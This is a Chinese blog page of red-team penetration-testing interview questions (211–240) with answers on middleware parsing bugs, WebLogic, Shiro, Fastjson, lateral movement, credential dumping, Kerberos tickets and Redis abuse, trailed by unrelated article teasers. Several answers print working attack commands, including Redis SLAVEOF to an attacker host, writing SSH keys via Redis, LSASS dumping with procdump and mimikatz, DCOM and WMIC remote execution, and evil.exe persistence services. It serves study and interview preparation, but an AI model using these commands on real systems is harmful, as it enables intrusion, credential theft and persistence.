2025年渗透测试面试题总结-渗透测试红队面试八(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
渗透测试红队面试八
二百一十一、常见中间件解析漏洞利用方式
二百一十二、MySQL用户密码存储与加密
二百一十三、Linux系统加固降权思路
二百一十四、绕过CDN获取真实IP
二百一十五、CMD查询远程开放端口
二百一十六、查找域控方法
二百一十七、CSRF成因及防御(非Token方案)
二百一十八、打点常用漏洞
二百一十九、Shiro漏洞发现方法
二百二十、WebLogic权限绕过
二百二十一、Fastjson漏洞原理
二百二十二、WebLogic漏洞类型
二百二十三、IIOP协议与类似技术
二百二十四、不出网漏洞利用方法
二百二十五、Webshell不出网应对措施
二百二十六、DNS出网协议利用
二百二十七、横向渗透命令执行手段
二百二十八、PsExec与WMIC区别
二百二十九、DCOM远程执行操作
二百三十、密码抓取方法
二百三十一、密码抓取版本限制
二百三十二、抓不到密码的应对
二百三十三、域内攻击方法
二百三十四、NTLM验证机制
二百三十五、Kerberos票据攻击
二百三十六、Windows Redis利用
二百三十七、Linux Redis利用
二百三十八、Windows后门方式
二百三十九、CS的哈希与密码获取
二百四十、收集RDP记录及对抗杀软
渗透测试红队面试八
二百一十一、说说常见的中间件解析漏洞利用方式二百一十二、mysql的用户名密码是存放在那张表里面?mysql密码采用哪种加密方式?二百一十三、Windows、Linux、数据库的加固降权思路,任选其一二百一十四、如何绕过CDN获取目标网站真实IP,谈谈你的思路?二百一十五、CMD命令行如何查询远程终端开放端口二百一十六、怎么查找域控二百一十七、CSRF 成因及防御措施;如果不用 token 如何做防御?二百一十八、打点一般会用什么漏洞二百一十九、平常怎么去发现shiro漏洞的二百二十、weblogic权限绕过有没有了解二百二十一、fastjson漏洞利用原理二百二十二、weblogic有几种漏洞二百二十三、IIOP听说过吗,和什么类似二百二十四、这几个漏洞不出网情况下怎么办二百二十五、拿到webshell不出网情况下怎么办二百二十六、dns出网协议怎么利用二百二十七、横向渗透命令执行手段二百二十八、psexec和wmic或者其他的区别二百二十九、Dcom怎么操作?二百三十、抓取密码的话会怎么抓二百三十一、什么版本之后抓不到密码二百三十二、抓不到的话怎么办二百三十三、域内攻击方法有了解过吗二百三十四、ntlm验证机制二百三十五、kerberos认证黄金、白银票据制作原理,以及需要哪个值二百三十六、window redis 需要有哪些利用手段,除了写文件和启动项二百三十七、linux redis 写有哪些利用方式二百三十八、windows后门包括哪些方式二百三十九、cs hashdump和logonpasswd 分别从哪里读取哈希和密码二百四十、如何收集rdp连接记录,如果有杀软怎么办
二百一十一、常见中间件解析漏洞利用方式
- IIS解析漏洞
- 目录解析:
/test.asp;.jpg
被解析为ASP脚本(IIS6.0)。- 分号截断:
test.asp;.jpg
利用分号绕过扩展名检查。- PUT写文件:通过HTTP PUT方法上传脚本文件(需配置不当)。
- Apache解析漏洞
- 多后缀解析:
test.php.xxx
若.xxx
未定义,按最后一个有效后缀解析(如.php
)。.htaccess
覆盖:上传自定义.htaccess
设置解析规则(如AddType application/x-httpd-php .jpg
)。- Nginx解析漏洞
- 路径解析错误:
/test.jpg/test.php
将test.jpg
作为PHP执行(Nginx + PHP-FPM配置不当)。- CVE-2013-4547:利用未正确处理空格和
\0
字符绕过检查(如test.jpg \0.php
)。
二百一十二、MySQL用户密码存储与加密
- 存储位置
- 表名:
mysql.user
表存储用户名、主机权限及密码哈希。- 字段:
authentication_string
(MySQL 5.7+)或password
(旧版)。- 加密方式
- MySQL 4.1+:双重SHA1加密(
SHA1(SHA1(password))
)。- MySQL 8.0+:默认使用
caching_sha2_password
插件(SHA256哈希)。- 补充信息
- 查询用户权限:
SELECT user, host, authentication_string FROM mysql.user;
- 身份验证插件变更可能导致旧客户端兼容性问题(需启用
mysql_native_password
)。
二百一十三、Linux系统加固降权思路
- 最小权限原则
- 用户权限:创建低权限用户运行服务(如
www-data
运行Web服务)。- SUID/SGID清理:
find / -perm /4000 -o -perm /2000
查找并删除非必要特权文件。- 服务与网络加固
- 禁用无用服务:
systemctl disable vsftpd
关闭FTP等非必要服务。- 防火墙规则:
iptables
限制仅开放必要端口(如SSH仅允许特定IP)。- 文件系统安全
- 敏感文件权限:
chmod 600 /etc/shadow
限制访问。- SELinux/AppArmor:启用强制访问控制,限制进程权限。
二百一十四、绕过CDN获取真实IP
- 历史记录查询
- DNS历史:通过SecurityTrails、ViewDNS查询历史解析记录。
- IP数据库:使用Censys或Shodan搜索目标域名早期绑定的IP。
- 子域名探测
- 爆破子域:
subfinder
或amass
发现未使用CDN的子域(如dev.example.com
)。- 邮件服务器:分析邮件头中
Received
字段获取服务器IP。- 主动探测技巧
- SSRF漏洞:利用目标站点的SSRF读取内网元数据(如AWS的
169.254.169.254
)。- 全网段扫描:对目标域名解析的CDN IP段进行端口扫描,寻找非标准端口服务。
二百一十五、CMD查询远程开放端口
- 基础命令
- Telnet:
telnet <IP> <端口>
(若连接成功则端口开放)。- Netstat:
netstat -ano | findstr "ESTABLISHED"
查看本地连接。- PowerShell工具
- Test-NetConnection:
Test-NetConnection <IP> -Port <端口>
显示端口状态。- 第三方工具
- Nmap:
nmap -p 1-1000 <IP>
扫描指定端口范围。- PortQry:微软工具,支持批量端口检测。
二百一十六、查找域控方法
- DNS查询
- SRV记录:
nslookup -type=SRV _ldap._tcp.dc._msdcs.< 域名>
定位域控的LDAP服务。- 系统命令
- nltest:
nltest /dclist:<域名>
列出域控列表。- net命令:
net group "Domain Controllers" /domain
查询域控组。- LDAP查询
- PowerShell:
powershellGet-ADDomainController -Discover -Service PrimaryDC | Select-Object Name, IPv4Address
二百一十七、CSRF成因及防御(非Token方案)
- 漏洞成因
- 浏览器自动携带Cookie:攻击者诱导用户访问恶意页面,触发跨站请求。
- 无二次验证:敏感操作未校验请求来源。
- 防御措施(非Token)
- SameSite Cookie:设置
SameSite=Strict
限制跨站请求。- Referer验证:检查HTTP头
Referer
是否来自合法域名。- CAPTCHA验证:关键操作前要求用户输入验证码。
二百一十八、打点常用漏洞
- Web漏洞
- SQL注入:通过注入获取数据库权限(如后台管理员凭证)。
- 文件上传:上传Webshell控制服务器(如绕过类型检查)。
- 服务漏洞
- 未授权访问:Redis、MongoDB等直接执行命令。
- RCE漏洞:如Log4j2、Fastjson反序列化。
- 配置缺陷
- 默认密码:Tomcat、Jenkins等管理界面弱口令。
- SSRF:利用内网探测或元数据服务攻击。
二百一十九、Shiro漏洞发现方法
- Cookie特征识别
- RememberMe字段:Base64解码后开头为
x01x02x03
或x04
(序列化数据特征)。- 漏洞扫描工具
- ShiroExploit:自动化检测密钥及反序列化漏洞。
- Burp插件:
ShiroScan
检测Cookie有效性。- 手工检测
- 密钥爆破:利用已知密钥列表(如kPH+bIxk5D2deZiIxcaaaA==)测试反序列化。
- DNSLog验证:构造恶意序列化数据触发DNS请求,确认漏洞存在。
二百二十、WebLogic权限绕过
- CVE-2020-14882
- 未授权访问:访问
/console/css/%252e%252e%252fconsole.portal
绕过控制台认证。- 利用工具:
weblogic-framework
直接执行命令。- CVE-2021-2109
- 管理接口绕过:通过构造特殊URL路径访问后台功能。
- 修复建议
- 更新补丁,限制管理接口访问IP,启用强认证机制。
二百二十一、Fastjson漏洞原理
- 反序列化机制
- @type指定类:攻击者通过JSON中的
@type
指定恶意类触发Gadget链。- JNDI注入:利用
com.sun.rowset.JdbcRowSetImpl
等类加载远程恶意代码。- 漏洞版本
- <=1.2.24:默认支持autoType,可直接利用。
- 1.2.25-1.2.47:需绕过autoType检查(如利用
L
前缀或特殊类名)。- 防御方案
- 升级至1.2.83+版本,关闭autoType功能,使用白名单机制。
二百二十二、WebLogic漏洞类型
- 反序列化漏洞
- T3协议:CVE-2018-2628利用T3反序列化执行命令。
- XMLDecoder:CVE-2017-10271通过WLS组件触发。
- SSRF漏洞
- CVE-2014-4210:
uddiexplorer
组件未限制内网请求。- 权限绕过
- CVE-2020-14825:绕过Console组件权限校验。
二百二十三、IIOP协议与类似技术
- IIOP协议
- 用途:CORBA的通信协议,用于分布式对象调用。
- 类似技术:与RMI(Java远程方法调用)类似,均涉及序列化数据传输。
- 漏洞利用
- 反序列化攻击:通过IIOP传输恶意对象触发Gadget链(如WebLogic CVE-2020-2551)。
二百二十四、不出网漏洞利用方法
- DNS/ICMP隧道
- DNS协议:使用
dnscat2
通过DNS查询传输数据。- ICMP协议:利用
ptunnel
或icmpsh
建立隐蔽通道。- 内网服务中继
- SMB Relay:通过Responder工具捕获NTLM哈希并中继至其他主机。
- Web反向连接
- HTTP文件传输:通过Web服务上传/下载文件(如Python
http.server
)。
二百二十五、Webshell不出网应对措施
- 内网探测
- 扫描内网段:使用
for /L %i in (1,1,255) do ping -n 1 192.168.1.%i
发现存活主机。- 利用现有服务
- 数据库外联:通过MySQL
SELECT ... INTO OUTFILE
写入Web目录。- 邮件发送:使用SMTP协议将数据外传。
- 内存加载
- PowerShell脚本:反射加载恶意代码,避免落地文件。
二百二十六、DNS出网协议利用
- DNS隧道
- 工具:
dnscat2
建立加密隧道,执行命令或传输文件。- 隐蔽性:利用TXT或CNAME记录传输数据,绕过防火墙检测。
- 数据渗透
- 子域名携带数据:
data.example.com
解析为Base64编码的敏感信息。
二百二十七、横向渗透命令执行手段
- PsExec
- 特点:需目标开启ADMIN$共享,生成服务执行命令,日志明显。
- WMI
- 命令:
wmic /node:<IP> process call create "cmd.exe /c whoami"
- 优势:无需安装客户端,基于135端口。
- SSH密钥利用
- 条件:获取目标SSH私钥,通过
ssh -i id_rsa user@ip
直接登录。
二百二十八、PsExec与WMIC区别
PsExec WMIC 需目标开启ADMIN$共享和文件写入权限。 仅需135端口和有效凭证,无需文件操作。 生成服务进程,日志记录明显(svchost)。 通过WMI协议执行,日志较隐蔽。 适合批量操作,但易触发告警。 更隐蔽,但命令长度受限。
二百二十九、DCOM远程执行操作
- 原理
- DCOM接口:通过COM对象远程调用方法(如MMC20.Application)。
- 利用步骤
- 列出DCOM对象:
Get-CimInstance Win32_DCOMApplication
- 执行命令:
powershell
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<IP>")) $com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami", "7")
二百三十、密码抓取方法
- Mimikatz
- 命令:
sekurlsa::logonpasswords
提取内存中的明文密码和哈希。- 注册表导出
- SAM/SYSTEM文件:
reg save HKLM\SAM SAM.bak
导出后使用secretsdump解析。- Procdump转储
- 转储LSASS:
procdump.exe -ma lsass.exe lsass.dmp
,本地用Mimikatz解析。
二百三十一、密码抓取版本限制
- Windows 8.1/Server 2012+
- WDigest禁用:默认不缓存明文密码(需启用注册表项
UseLogonCredential
)。- Windows 10/Server 2016+
- LSASS保护:启用Credential Guard后无法直接读取内存密码。
二百三十二、抓不到密码的应对
- 哈希传递(Pass-the-Hash)
- 工具:
psexec.py
或crackmapexec
使用NTLM哈希横向移动。- Kerberos票据
- 黄金票据:利用krbtgt哈希伪造TGT,访问任意服务。
二百三十三、域内攻击方法
- 横向移动
- MS17-010:利用永恒之蓝漏洞攻击未修补主机。
- 权限提升
- ACL滥用:修改域对象的ACL,授予自身特权(如DCsync权限)。
- 持久化
- Skeleton Key:植入恶意域控后门,使用万能密码登录。
二百三十四、NTLM验证机制
- 三步握手
- 协商:客户端发送NEGOTIATE_MESSAGE。
- 挑战:服务器返回CHALLENGE_MESSAGE(包含随机Nonce)。
- 认证:客户端使用密码哈希加密Nonce生成RESPONSE_MESSAGE。
- 中间人攻击
- NTLM Relay:将认证请求中继至其他服务器,执行命令或获取权限。
二百三十五、Kerberos票据攻击
- 黄金票据
- 原理:伪造TGT票据,需krbtgt的NTLM哈希和域SID。
- 用途:访问域内任意服务。
- 白银票据
- 原理:伪造特定服务的ST票据,需服务账户哈希和服务SPN。
- 用途:仅限访问特定服务(如CIFS文件共享)。
二百三十六、Windows Redis利用
- 主从复制RCE
- 步骤:设置恶意主节点,同步
module.dll
执行命令。- 命令:
bash
redis-cli -h <target> SLAVEOF <attacker-ip> 6379
- 计划任务劫持
- 写入任务:通过
CONFIG SET dir
和dbfilename
写入恶意任务文件。
二百三十七、Linux Redis利用
- SSH密钥写入
- 命令:
bas
redis-cli -h <target> config set dir /root/.ssh redis-cli -h <target> config set dbfilename "authorized_keys" redis-cli -h <target> set x "\n\nssh-rsa AAAAB3Nz...\n\n" redis-cli -h <target> save
- Crontab后门
- 写入任务:设置定时任务反弹Shell。
二百三十八、Windows后门方式
- 注册表启动项
- 路径:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- 计划任务
- 命令:
schtasks /create /tn "Update" /tr "C:\evil.exe" /sc onstart
- 服务后门
- 创建服务:
sc create EvilService binPath= "C:\evil.exe" start= auto
二百三十九、CS的哈希与密码获取
- hashdump
- 来源:从LSASS进程内存中提取NTLM哈希。
- logonpasswords
- 来源:从Windows凭据管理器获取明文密码(需WDigest启用)。
二百四十、收集RDP记录及对抗杀软
- 记录位置
- 注册表:
HKCU\Software\Microsoft\Terminal Server Client\Servers
- 日志文件:
%USERPROFILE%\Documents\Default.rdp
- 绕过杀软
- 离线提取:直接复制注册表文件或日志到本地分析。
- 隐蔽工具:使用PowerShell脚本读取注册表,避免触发行为检测。
相关文章:
2025年渗透测试面试题总结-渗透测试红队面试八(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 渗透测试红队面试八 二百一十一、常见中间件解析漏洞利用方式 二百一十二、MySQL用户密码存储与加密 …...
前端面试高频50个问题,解答
以下是前端面试中常见的50个高频问题及其简要解答: HTML HTML5 有哪些新特性? 语义化标签(如 <header>、<footer>)、多媒体支持(如 <audio>、<video>)、本地存储(如 l…...
Elasticsearch架构原理
1、Elasticsearch的节点类型 1.1 Master节点 在Elasticsearch启动时,会选举出来一个Master节点。当某个节点启动后,然后 使用Zen Discovery机制找到集群中的其他节点,并建立连接。 discovery.seed_hosts: ["192.168.21.130", &qu…...
前端面试宝典---webpack面试题
webpack 的 tree shaking 的原理 Webpack 的 Tree Shaking 过程主要包含以下步骤: 模块依赖分析:Webpack 首先构建一个完整的模块依赖图,确定每个模块之间的依赖关系。导出值分析:通过分析模块之间的 import 和 exportÿ…...
Vue 2 项目中配置 Tailwind CSS 和 Font Awesome 的最佳实践
Vue 2 项目中配置 Tailwind CSS 和 Font Awesome 的最佳实践 一、Tailwind CSS 配置 1. 安装依赖 npm install tailwindcssnpm:tailwindcss/postcss7-compat tailwindcss/postcss7-compat postcss^7 autoprefixer^92. 创建配置文件 npx tailwindcss init3. 创建样式文件 在…...
hiveserver2与beeline进行远程连接hive配置及遇到的问题
1、hiveserver2 参与用户模拟功能,因为开启后才能保证各用户之间的权限隔离。 1.1、配置 $HADOOP_HOME/etc/hadoop/core-site.xml <!--配置所有节点的root用户都可作为代理用户--> <property><name>hadoop.proxyuser.root.hosts</name>&…...
单词短语0512
当然可以,下面是“opportunity”在考研英语中的常用意思和高频短语,采用大字体展示,便于记忆: ✅ opportunity 的考研常用意思: 👉 机会,良机 表示有利的时机或条件,尤指成功的可能…...
c++刷题便捷函数(类似于stoi的小函数)
标题 stoi(字符串转整形)map和set都有count成员函数,返回值是该key的个数,可以用来查是否存在该元素。bool is_sorted(nums.begin(), nums.end() 检验是否有序INT_MAX,INT_MIN分别是整形最大和最小初始化二维矩阵 vector<vector\<int>> mart…...
想实现一个基于MCP的pptx生成系统架构图【初版实现】
技术栈:Python + MCP协议 + python-pptx + FastMCP 核心创新点:通过MCP协议实现PPTX元素的动态化生成与标准化模板管理 当前还是个半成品,后续持续更新。 主要先介绍一下思路。 一、MCP协议与系统设计原理 1.1 为什么选择MCP? 标准化工具调用:通过MCP将PPTX元素生成逻辑封…...
jwt学习
基于token的鉴权机制也是无状态的(类似于http协议),不需要保在服务端保留用户的认证或会话信息。 构成 jwt由三部分构成:头部、payload、签名,中间用.隔开 头部(header) 包含两部分信息:声明类型、声明加密的算法 例如:…...
pth的模型格式怎么变成SafeTensors了?
文章目录 背景传统模型格式的安全隐患效率与资源瓶颈跨框架兼容性限制Hugging Face 的解决方案:SafeTensors行业与社区的推动SafeTensors 的意义总结 背景 最近要找一些适合embedding的模型,在huggingface模型库上看到一些排名比较靠前的,准…...
如何判断IP是否被平台标记
一、基础检测:连通性与黑名单筛查 网络连通性测试 Ping与Traceroute:通过命令测试延迟和路由路径,若延迟>50ms或存在异常节点(如某跳延迟>200ms),可能影响可用性。示例命令: bash ping 8.…...
【c++】异常详解
目录 C语言处理错误的局限性异常的定义异常的具体使用细则异常的抛出与捕获在函数调用链中异常栈展开匹配原则异常的重新抛出异常规范throw(类型)noexcept 成熟的异常体系c自己的异常体系异常的优缺点优点缺点 异常安全 C语言处理错误的局限性 C语言处理错误常常会用到assert和…...
从模型加密到授权交付,CodeMeter赋能3D打印商业化全流程
引言 在数字化制造快速演进的当下,3D 打印(增材制造)作为具备高度灵活性与创新潜力的制造方式,正重塑备件供应链与产品生命周期管理。然而,随着应用场景不断扩展,企业面临的知识产权保护、数字资产商业化与…...
ESP32开发之freeRTOS的事件组
什么是事件组事件组的应用场景事件组的API函数事件组应用举例总结什么是事件组 概念:事件组就是一个整数,高8位给内核使用,其他位用来表示事件。在ESP32的IDF freeRTOS中,这个整数是32位的,低24位用来供事件组使用。 举一个生活中的例子: 你在等快递,有三个包裹来自不…...
K8S中构建双架构镜像-从零到成功
背景介绍 公司一个客户的项目使用的全信创的环境,服务器采用arm64的机器,而我们的应用全部是amd64的,于是需要对现在公司流水线进行arm64版本的同步镜像生成。本文介绍从最开始到最终生成双架构的全部过程,以及其中使用的相关配置…...
腾讯怎样基于DeepSeek搭建企业应用?怎样私有化部署满血版DS?直播:腾讯云X DeepSeek!
2025新春,DeepSeek横空出世,震撼全球! 通过算法优化,DeepSeek将训练与推理成本降低至国际同类模型的1/10,极大的降低了AI应用开发的门槛。 可以预见,2025年,是AI应用落地爆发之年! ✔…...
【论信息系统项目的质量管理】
论信息系统项目的质量管理 前言一、抓好质量管理规划工作,为质量管理和确认提供指南和方向。二、做好管理质量相关工作,促进质量过程改进。三、抓好控制质量,确保实现质量目标四、综合协调质量与成本、进度、范围的关系总结 前言 为解决日常出…...
SpringAI框架中的RAG模块详解及应用示例
SpringAI框架中的RAG模块详解及应用示例 RAG(Retrieval-Augmented Generation)可以通过检索知识库,克服大模型训练完成后参数冻结的局限性,携带知识让大模型根据知识进行回答。SpringAI框架提供了模块化的API来支持RAG࿰…...
图像增强技术
一、目的 通过本实验加深对数字图像增强操作的理解,熟悉MATLAB中的有关函数;了解直方图均衡化和卷积滤波的原理;熟悉低通和高通滤波模板的构造方法。 二、实验内容与设计思想 1、观察实验结果可看出, 原图像 I的对比度较低&…...
【Java学习笔记】多态参数
多态参数 应用:方法定义的形参类型为父类类型,实参允许为子类类型 // 父类 package polyparemeter;public class employee {private String name;private double salary;//构造器public employee(){}public employee(String name, double salary) {thi…...
计算机网络核心技术解析:从基础架构到应用实践
计算机网络作为现代信息社会的基石,承载着全球数据交换与资源共享的核心功能。本文将从网络基础架构、核心协议、分层模型到实际应用场景,全面解析计算机网络的核心技术,并结合行业最新趋势,为读者构建系统的知识体系。 一、计算机…...
LiveData:Android响应式编程的核心利器
LiveData是一种可观察的数据持有类,用于在Android应用中实现数据的响应式编程。它具有以下特点和作用: 特点 生命周期感知:LiveData能够感知与其关联的组件(如Activity、Fragment)的生命周期状态。只有当组件处于活跃状态(如Activity处于RESUMED状态)时,LiveData才会将…...
【LeeCode】1.两数之和
文章目录 1. 暴力求解2. 哈希表具体过程1. nums [2, 7, 11, 15],target 9:2. nums [11, 15, 2, 7], target 9 给定一个整数数组 nums 和一个整数目标值 target,请你在该数组中找出 和为目标值 target 的那 两个 整数ÿ…...
继承关系下创建对象的具体流程
public class Person {int x initX(); // 显式初始化:调用方法 initX()public Person() {System.out.println("Parent 构造器执行, x " x);}int initX() {System.out.println("initX() 被调用了");return 100;} }public class Child extends…...
基于世界土壤数据库(HWSD)的中国土壤数据集(v1.1)(2009)
时间分辨率:年共享方式:开放获取数据大小:156.47 MB数据时间范围:2009元数据更新时间:2020-03-26 数据集摘要 数据来源于联合国粮农组织(FAO)和维也纳国际应用系统研究所(IIASA)所构建的世界土…...
mac M2能安装的虚拟机和linux系统系统
目前网上的资料大多错误,能支持M2的很少。 推荐安装的改造过的centos7也无法进行yum操作,建议安装centos8 VMware Fusion下载地址: https://pan.baidu.com/s/14v3Dy83nuLr2xOy_qf0Jvw 提取码: jri4 centos8下载地址: https://…...
212. 单词搜索 II【 力扣(LeetCode) 】
文章目录 零、原题链接一、题目描述二、测试用例三、解题思路四、参考代码 零、原题链接 212. 单词搜索 II 一、题目描述 给定一个 m x n 二维字符网格 board 和一个单词(字符串)列表 words, 返回所有二维网格上的单词 。 单词必须按照字母…...
【软考-高级】【信息系统项目管理师】论文写作注意事项及2014年至2024年历年论文题目汇总
论文写作注意事项 要求 字数要求:2500字以内(2024年超过2500字,在线答题系统无法输入)时长要求:2小时(大多数人不够用)内容要求: 必须响应子标题,如子标题要求写如何优…...
MySQL数据库表的约束
目录 1.null属性 2.默认值约束(default) 3.comment 4.zerofill 5.主键(primary key) 6.自增长(auto_increment) 7.唯一键(unique) 编辑 8.外键 约束是为了安全插入数据&a…...
硅基计划2.0 学习总结 壹 Java初阶
一、初见Java (1)Java简介 首先不得不承认Java是一门优秀的程序设计语言 其系列的计算机软件和跨平台体系包括国内的生态链完善是C/C语言难以弥补的 (2)Java SE 全称Java Standard Edition,是Java体系的基础 &am…...
逆向破解:x64dbg
文章目录 一、CPU窗口1、反汇编窗口2、寄存器窗口3、栈地址窗口4、十六进制数据窗口5、堆栈参数解析窗口 二、常用快捷键三、字符串检索功能四、调试功能1、上一步 一、CPU窗口 1、反汇编窗口 2、寄存器窗口 寄存器窗口用于显示和解释当前线程环境下CPU寄存器的各种状态值和内…...
从MCU到SoC的开发思维转变
目录 1、硬件设计 2、软件开发 3、调试与测试 4、电源管理 微控制器单元(MCU)和系统级芯片(SoC)是嵌入式开发中最常见的两种处理器类型。MCU以其简单、低功耗的特点,广泛应用于特定控制任务;而SoC凭借强…...
3DGS-to-PC:3DGS模型一键丝滑转 点云 or Mesh 【Ubuntu 20.04】【2025最新版!!】
一、引言 3D高斯泼溅(3DGS)是一种新兴的三维场景表示方法,可以生成高质量的场景重建结果。然而,要查看这些重建场景,需要特殊的高斯渲染器。大多数3D处理软件并不兼容3D高斯分布模型,但它们通常都兼容点云文件。 3DGS-to-PC项目提…...
互联网大厂Java求职面试:优惠券服务架构设计与AI增强实践-3
互联网大厂Java求职面试:优惠券服务架构设计与AI增强实践-3 场景背景 面试场景设定在一家大型互联网公司,面试官为拥有10年以上经验的技术总监,专注于高并发、高可用系统的架构设计。候选人郑薪苦是一名技术潜力十足的程序员,擅…...
ABP-Book Store Application中文讲解 - 前期准备 - Part 3:Acme.BookStore项目模块详解
ABP-Book Store Application中文讲解-汇总-CSDN博客 本文通过对Acme.BookStore项目各模块的详解,让大家知道每个project用来干什么的,他们之间的引用关系是什么,同时知道怎样添加新的功能模块。 Acme.Bookstore 是主要 ABP Studio 模块的主…...
智慧城市综合运营管理系统Axure原型
这款Axure原型的设计理念紧紧围绕城市管理者的需求展开。它旨在打破传统城市管理中信息孤岛的局面,通过统一标准接入各类业务系统,实现城市运营管理信息资源的全面整合与共享。以城市管理者为中心,为其提供一个直观、便捷、高效的协同服务平台…...
Java中进阶并发编程
第一章、并发编程的挑战 并发和并行:指多线程或多进程 线程的本质:操作系统能够进行运算调度的最小单位,是进程(Process)中的实际工作单元 进程的本质:操作系统进行资源分配和调度的基本单位,…...
cursor 出现问题 为客户解决问题
文档出自:https://www.kdocs.cn/l/cp5GpLHAWc0p...
【氮化镓】GaN在不同电子能量损失的SHI辐射下的损伤
该文的主要发现和结论如下: GaN的再结晶特性 :GaN在离子撞击区域具有较高的再结晶倾向,这导致其形成永久损伤的阈值较高。在所有研究的电子能量损失 regime 下,GaN都表现出这种倾向,但在电子能量损失增加时,其效率会降低,尤其是在材料发生解离并形成N₂气泡时。 能量损失…...
用drawdb.app可视化创建mysql关系表
平时自己建表,没有可视化图形参考 为了便于理解,用drwadb画mysql关系表 drawDB | Online database diagram editor and SQL generator...
模型上下文协议(MCP):AI的“万能插座”
~犬📰余~ “我欲贱而贵,愚而智,贫而富,可乎? 曰:其唯学乎” 一、MCP解决什么问题? \quad 在过去的几年中,AI大模型快速发展,从横空出世的GPT到“AI界拼多多”DeepSeek&am…...
初识 Pandas:Python 数据分析的利器
在数据分析、数据清洗和可视化等领域,Python 无疑是最受欢迎的语言之一,而在 Python 的数据处理生态中,Pandas 是最核心、最基础的库之一。如果你接触数据分析、机器学习、金融建模,或者只是想处理一些 Excel 表格,那么…...
Python教程(四)参数提取pymysql
Python(四) 本系列其他教程: Python教程(二):函数、异常、模块&包、文件读取、常用模块 Python教程(三):类&对象、闭包、装饰器、类型注解 Python教程(三):类&对象、闭包、装饰器、类型注解、…...
Halcon案例(一):C#联合Halcon识别路由器上的散热孔
本案例分3部分 识别效果,分别显示识别前后识别后;代码展示,分别是Halcon源码和Halcon转为C#的代码代码解释(解释在源码中) 原图如下: 处理后的图像: Halcon源码: *读取一张图像 read_image (Image, progres)*获取图像大小 get_image_size (Image, Width, Height)*关…...
SC5061串口设备联网服务器,4路RS-232,4路422/485串行接口
串口设备联网服务器,简称串口服务器。能够将RS-232/485/422串口设备联入TCP/IP网络,实现RS-232/485/422串口与TCP/IP网络接口的数据双向传输,使得串口设备能够具备联网功能,根据串口数量的不同,可以分为单串口、两串口…...
谈AI/OT 的融合
过去的十几年间,工业界讨论最多的话题之一就是IT/OT 融合,现在,我们不仅要实现IT/OT 的融合,更要面向AI/OT 的融合。看起来不太靠谱,却留给我们无限的想象空间。OT 领域的专家们不要再当“九斤老太”,指责这…...
RAGFlow 初步尝试 (01)
1. 起因, 目的: 简单尝试一下。 2. 先看效果 3. 过程: 目的: 研究 RAG 的实现过程。 实用目的: 对于一本电子书, pdf,我在读书的时候,可以问一写些问题。对一个 github 项目,可以迅速理解文件的关系。…...
Linux 服务器用 SSH 拉取多个 Git 工程
在一台 Linux 服务器上用 SSH 拉取两个 Git 工程,而这两个工程对应的是 不同的 Git 账号(SSH Key),做法: 使用 SSH Config 配置多个 Git 账号 场景假设: 工程 A 的仓库地址:gitgithub.com:com…...
测试文章标题01
模型上下文协议(Model Context Protocol, MCP)深度解析 一、MCP的核心概念 模型上下文协议(Model Context Protocol, MCP)是一种用于规范机器学习模型与外部环境交互的标准化框架。其核心目标是通过定义统一的接口和数据格式&am…...